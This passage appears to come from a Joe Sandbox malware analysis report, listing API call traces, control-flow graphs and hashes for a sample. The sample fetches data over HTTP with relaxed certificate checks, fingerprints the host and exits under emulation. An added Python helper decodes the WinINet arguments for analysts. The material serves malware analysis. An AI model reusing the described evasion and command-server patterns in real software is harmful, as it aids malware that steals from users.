                                  • Opcode Fuzzy Hash: b930a3216fbe5d38116a69d6a4b990c00cf28654999faabd89b5afcacdd663fd
                                  • Instruction Fuzzy Hash: 6DA2903090121ADFCB22DF75D949A6AB7F5AF44710F19817AE909DB3A2DB31DC42CB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400013
                                  • lstrlen.KERNEL32(0040CFEC), ref: 004000BD
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 004000E1
                                  • lstrlen.KERNEL32(0040CFEC), ref: 004000EC
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400110
                                  • lstrlen.KERNEL32(0040CFEC), ref: 0040011B
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 0040013F
                                  • lstrlen.KERNEL32(0040CFEC), ref: 0040015A
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400189
                                  • lstrlen.KERNEL32(0040CFEC), ref: 00400194
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 004001C3
                                  • lstrlen.KERNEL32(0040CFEC), ref: 004001CE
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400206
                                  • lstrlen.KERNEL32(0040CFEC), ref: 00400250
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0040059B
                                  • lstrlen.KERNEL32(01196678), ref: 004005AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004005D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 004005E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040060E
                                  • lstrlen.KERNEL32(011B0670), ref: 00400625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0040064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00400658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00400681
                                  • lstrlen.KERNEL32(01196878), ref: 00400698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004006C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 004006D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00400706
                                  • lstrcpy.KERNEL32(00000000,011A8C78), ref: 0040074B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0040077F
                                  • lstrcpy.KERNEL32(00000000,011B04D8), ref: 004007E7
                                  • lstrcpy.KERNEL32(00000000,011A8978), ref: 00400858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 004008CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00400928
                                  • lstrcpy.KERNEL32(00000000,011A8A18), ref: 004009F8
                                    • Part of subcall function 003E24E0: lstrcpy.KERNEL32(00000000,?), ref: 003E2528
                                    • Part of subcall function 003E24E0: lstrcpy.KERNEL32(00000000,?), ref: 003E254E
                                    • Part of subcall function 003E24E0: lstrcpy.KERNEL32(00000000,?), ref: 003E2577
                                  • lstrcpy.KERNEL32(00000000,011A8A88), ref: 00400ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00400B81
                                  • lstrcpy.KERNEL32(00000000,011A8A88), ref: 00400D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 663b387fa422f8a1e3ebde3ee3a26aa9b368e98a3c8ed0bd8cf238fe8a232ae0
                                  • Instruction ID: c9c8b1e1f381728fa3826884dfb68dcf2740d78072b202b9dfa1dcd3b41721b8
                                  • Opcode Fuzzy Hash: 663b387fa422f8a1e3ebde3ee3a26aa9b368e98a3c8ed0bd8cf238fe8a232ae0
                                  • Instruction Fuzzy Hash: 19E26A70A053418FD724DF29C488B6BB7E1BF88314F58857EE48D9B3A2DB399841CB56

                                   Control-flow Graph (in the rendered graph each basic block is marked Executed or Not Executed)

                                   control_flow_graph 2234 3e6c40-3e6c64 call 3e2930 2237 3e6c66-3e6c6b 2234->2237 2238 3e6c75-3e6c97 call 3e4bc0 2234->2238 2237->2238 2239 3e6c6d-3e6c6f lstrcpy 2237->2239 2242 3e6caa-3e6cba call 3e2930 2238->2242 2243 3e6c99 2238->2243 2239->2238 2247 3e6cbc-3e6cc2 lstrcpy 2242->2247 2248 3e6cc8-3e6cf5 InternetOpenA StrCmpCA 2242->2248 2244 3e6ca0-3e6ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 3e6cfa-3e6cfc 2248->2249 2250 3e6cf7 2248->2250 2251 3e6ea8-3e6ebb call 3e2930 2249->2251 2252 3e6d02-3e6d22 InternetConnectA 2249->2252 2250->2249 2261 3e6ebd-3e6ebf 2251->2261 2262 3e6ec9-3e6ee0 call 3e2a20 * 2 2251->2262 2253 3e6d28-3e6d5d HttpOpenRequestA 2252->2253 2254 3e6ea1-3e6ea2 InternetCloseHandle 2252->2254 2256 3e6e94-3e6e9e InternetCloseHandle 2253->2256 2257 3e6d63-3e6d65 2253->2257 2254->2251 2256->2254 2259 3e6d7d-3e6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 3e6d67-3e6d77 InternetSetOptionA 2257->2260 2263 3e6daf-3e6dd3 call 4071e0 call 3e2a20 * 2 2259->2263 2264 3e6dd4-3e6de4 call 403d90 2259->2264 2260->2259 2261->2262 2265 3e6ec1-3e6ec3 lstrcpy 2261->2265 2264->2263 2275 3e6de6-3e6de8 2264->2275 2265->2262 2276 3e6dee-3e6e07 InternetReadFile 2275->2276 2277 3e6e8d-3e6e8e InternetCloseHandle 2275->2277 2276->2277 2279 3e6e0d 2276->2279 2277->2256 2281 3e6e10-3e6e15 2279->2281 2281->2277 2283 3e6e17-3e6e3d call 407310 2281->2283 2286 3e6e3f call 3e2a20 2283->2286 2287 3e6e44-3e6e51 call 3e2930 2283->2287 2286->2287 2291 3e6e53-3e6e57 2287->2291 2292 3e6e61-3e6e8b call 3e2a20 InternetReadFile 2287->2292 2291->2292 2293 3e6e59-3e6e5b lstrcpy 2291->2293 2293->2292
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E6C6F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6CC2
                                  • InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E6CD5
                                  • StrCmpCA.SHLWAPI(?,011B0C60), ref: 003E6CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003E6D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011B0550,00000000,00000000,-00400100,00000000), ref: 003E6D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003E6D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003E6D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 003E6DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003E6DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E6E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 003E6E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 003E6E8E
                                  • InternetCloseHandle.WININET(?), ref: 003E6E98
                                  • InternetCloseHandle.WININET(00000000), ref: 003E6EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E6EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: 72a8f92e6e41968add94c21bb78c8f91c9d7706d5d9250111f7477f553eee0e9
                                  • Instruction ID: 5095fb1bcf9f831bf3002250fa605cd0a5103cb9f85b86b22bc5eca5da8c003b
                                  • Opcode Fuzzy Hash: 72a8f92e6e41968add94c21bb78c8f91c9d7706d5d9250111f7477f553eee0e9
                                  • Instruction Fuzzy Hash: 1B81B271A40225AFDB21DFA5DC4AFEE77B9AF44740F154229F905EB2C0DB70AD408BA4
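                                   Two of the function records above are the ones an analyst will want to pull apart first: the LoadLibraryA/GetProcAddress resolver (refs 00406B4B to 004071C8), where every import name except CreateDesktopA, OpenDesktopA, CloseDesktop, InternetSetOptionA and HttpQueryInfoA is passed as a bare pointer whose string contents the report does not show, and the WinINet routine (refs 003E6C6F to 003E6EC3) that sets INTERNET_OPTION_SECURITY_FLAGS before HttpSendRequestA, reads the status code with HttpQueryInfoA and then loops on InternetReadFile. The Python below is an added example written for this page; it is not code from the Joe Sandbox report or from the sample. It parses the report's "APIs" line format, splits plaintext from pointer-only GetProcAddress names per module base, and decodes the WinINet arguments using standard wininet.h constants (INTERNET_OPTION_SECURITY_FLAGS = 0x1F, HTTP_QUERY_STATUS_CODE = 0x13, INTERNET_SERVICE_HTTP = 3, INTERNET_OPEN_TYPE_DIRECT = 1). The embedded sample lines are a constructed subset copied from the two listings; the signed HttpOpenRequestA flag value "-00400100" is deliberately left undecoded because the report's rendering of it is ambiguous, and any SECURITY_FLAG bit the decoder does not know is reported as raw hex rather than guessed.

```python
import re
from collections import defaultdict

# Constructed sample input: a subset of the "APIs" lines from this report, in the
# exact format Joe Sandbox prints them (bullet, Api.MODULE(args), ref: address).
SAMPLE_LINES = """
• LoadLibraryA.KERNEL32(011AE990), ref: 00406B4B
• GetProcAddress.KERNEL32(76910000,011AE948), ref: 00406EC1
• GetProcAddress.KERNEL32(76910000,CreateDesktopA), ref: 00406ED7
• GetProcAddress.KERNEL32(76910000,OpenDesktopA), ref: 00406EEE
• GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 004070CB
• GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 004070E2
• InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E6CD5
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003E6D15
• HttpOpenRequestA.WININET(00000000,GET,?,011B0550,00000000,00000000,-00400100,00000000), ref: 003E6D50
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003E6D77
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003E6D86
• HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 003E6DA5
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003E6DFF
  • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8_RE = re.compile(r"^-?[0-9A-F]{8}$")

# Standard wininet.h values (SDK constants, not taken from the report).
INTERNET_OPEN_TYPE_DIRECT = 1
INTERNET_SERVICE_HTTP = 3
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
HTTP_QUERY_STATUS_CODE = 0x13
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}


def parse_api_lines(text):
    """Turn report 'APIs' lines into dicts; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": raw.split(",") if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),   # caller address for 'Part of subcall' lines
        })
    return calls


def hexval(arg):
    """Decode an unsigned 8-digit hex argument; '?' and signed renderings give None."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def classify_getprocaddress(calls):
    """Per module base: names resolved in the clear vs. names passed only as pointers."""
    by_base = defaultdict(lambda: {"named": [], "pointer_only": 0})
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        base, name = c["args"][0], c["args"][1]
        if name == "?" or HEX8_RE.match(name):
            by_base[base]["pointer_only"] += 1
        else:
            by_base[base]["named"].append(name)
    return dict(by_base)


def security_flag_names(value):
    """Expand an INTERNET_OPTION_SECURITY_FLAGS value; unknown bits stay as hex."""
    names = [n for bit, n in sorted(SECURITY_FLAGS.items()) if value & bit]
    rest = value & ~sum(SECURITY_FLAGS)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def decode_wininet_chain(calls):
    """Annotate each WinINet call with the decoded constant a reviewer would look up."""
    notes = []
    for c in calls:
        if c["module"] != "WININET":
            continue
        a, note = c["args"], ""
        if c["api"] == "InternetOpenA" and hexval(a[1]) == INTERNET_OPEN_TYPE_DIRECT:
            note = "dwAccessType=INTERNET_OPEN_TYPE_DIRECT"
        elif c["api"] == "InternetConnectA" and hexval(a[5]) == INTERNET_SERVICE_HTTP:
            note = "nService=INTERNET_SERVICE_HTTP"
        elif c["api"] == "InternetSetOptionA" and hexval(a[1]) == INTERNET_OPTION_SECURITY_FLAGS:
            note = "INTERNET_OPTION_SECURITY_FLAGS=" + "|".join(security_flag_names(hexval(a[2])))
        elif c["api"] == "HttpQueryInfoA" and hexval(a[1]) == HTTP_QUERY_STATUS_CODE:
            note = "dwInfoLevel=HTTP_QUERY_STATUS_CODE"
        elif c["api"] == "InternetReadFile" and hexval(a[2]) is not None:
            note = f"dwNumberOfBytesToRead={hexval(a[2])}"
        notes.append((c["api"], note))
    return notes
```

                                   Calling `classify_getprocaddress(parse_api_lines(SAMPLE_LINES))` shows the resolver pattern at a glance (for base 76910000 only CreateDesktopA and OpenDesktopA appear by name; the rest are pointers), and `decode_wininet_chain` turns the InternetSetOptionA value 00010300 into SECURITY_FLAG_IGNORE_UNKNOWN_CA|SECURITY_FLAG_IGNORE_WRONG_USAGE|0x10000, which is the check that tells you the C2 fetch tolerates a certificate chain it cannot validate. Pasting the full "APIs" listings from the page in place of the sample gives the complete picture.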
                                  APIs
                                  • lstrlen.KERNEL32(01196798), ref: 003FF315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF47B
                                  • lstrcpy.KERNEL32(00000000,01196798), ref: 003FF4BB
                                  • lstrcpy.KERNEL32(00000000,011A8BA8), ref: 003FF4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003FF61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 003FF718
                                  • lstrlen.KERNEL32(011A8C58), ref: 003FF746
                                  • lstrcpy.KERNEL32(00000000,011A8C58), ref: 003FF771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 003FFA32
                                  • lstrlen.KERNEL32(011A8AE8), ref: 003FFA60
                                  • lstrcpy.KERNEL32(00000000,011A8AE8), ref: 003FFA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FFAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FFAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601

                                  Control-flow Graph (rendered graph not reproduced): function at 3f8ca0, calls StrCmpCA, ExitProcess, lstrlen, lstrcpy and internal routines 3e2a20, 3e2930
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458

                                  Control-flow Graph (rendered graph not reproduced): function at 402740, calls GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap, wsprintfA and internal routine 4071e0
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0040277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003F93B6,00000000,00000000,00000000,00000000), ref: 004027AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402816
                                  • wsprintfA.USER32 ref: 0040283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409

                                  Control-flow Graph (rendered graph not reproduced): function at 3e4bc0, calls ??2@YAPAXI@Z (3 times), lstrlen, InternetCrackUrlA and internal routine 3e2a20
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 003E4BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003E4C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003E4C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 003E4C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 003E4C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714

                                  Control-flow Graph (rendered graph not reproduced): function at 3e1030, calls GetCurrentProcess, VirtualAllocExNuma, ExitProcess, VirtualAlloc, VirtualFree
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003E1046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 003E104D
                                  • ExitProcess.KERNEL32 ref: 003E1058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003E106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003E10AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0

                                  Control-flow Graph (rendered graph not reproduced): function at 3fee90, calls lstrcpy, StrCmpCA and internal routines 3e2930, 3e6c40, 3e2a20
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 003FEEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 003FEF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601

                                  Control-flow Graph (rendered graph not reproduced): function at 3e10c0, calls GlobalMemoryStatusEx, ExitProcess
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989

                                  Control-flow Graph (rendered graph not reproduced): function at 3f8c88, calls StrCmpCA, ExitProcess, lstrlen, lstrcpy and internal routines 3e2a20, 3e2930
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 9770251cb7f5d548ba09b12ff5bcca54faf37beeab91bf477b93e3287260ff2e
                                  • Instruction ID: bef85f2ff5660413b9f03b1d0545769317ad6d1afb2790b102f761e74a428fef
                                  • Opcode Fuzzy Hash: 9770251cb7f5d548ba09b12ff5bcca54faf37beeab91bf477b93e3287260ff2e
                                  • Instruction Fuzzy Hash: 87E0923550434AEBC7149BB99CA89C2FB79EF89304B65446AE6005B650E730EC16C769

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2957 402ad0-402b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 402b44-402b59 2957->2958 2959 402b24-402b36 2957->2959
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00402AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00402B1A
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 7e7a65724865911a8f9b91189e007155b5cf22cfb187efd8af4d1f08456ed265
                                  • Instruction ID: eaf43adfa8dc55f22b18dfbeb56abaa3bfc1aab9962f63c31396d7bd6c3c8115
                                  • Opcode Fuzzy Hash: 7e7a65724865911a8f9b91189e007155b5cf22cfb187efd8af4d1f08456ed265
                                  • Instruction Fuzzy Hash: 7D01D672A44608ABC710CF99ED45B9EF7B8F748B22F00426BF915E3780D778190087A5
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003F23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003F2402
                                  • lstrlen.KERNEL32(\*.*), ref: 003F240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 003F2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 003F2486
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: efd8ada7aa876cedbdd5412fe24b2625d0583487009dc63d568cd7394e12366d
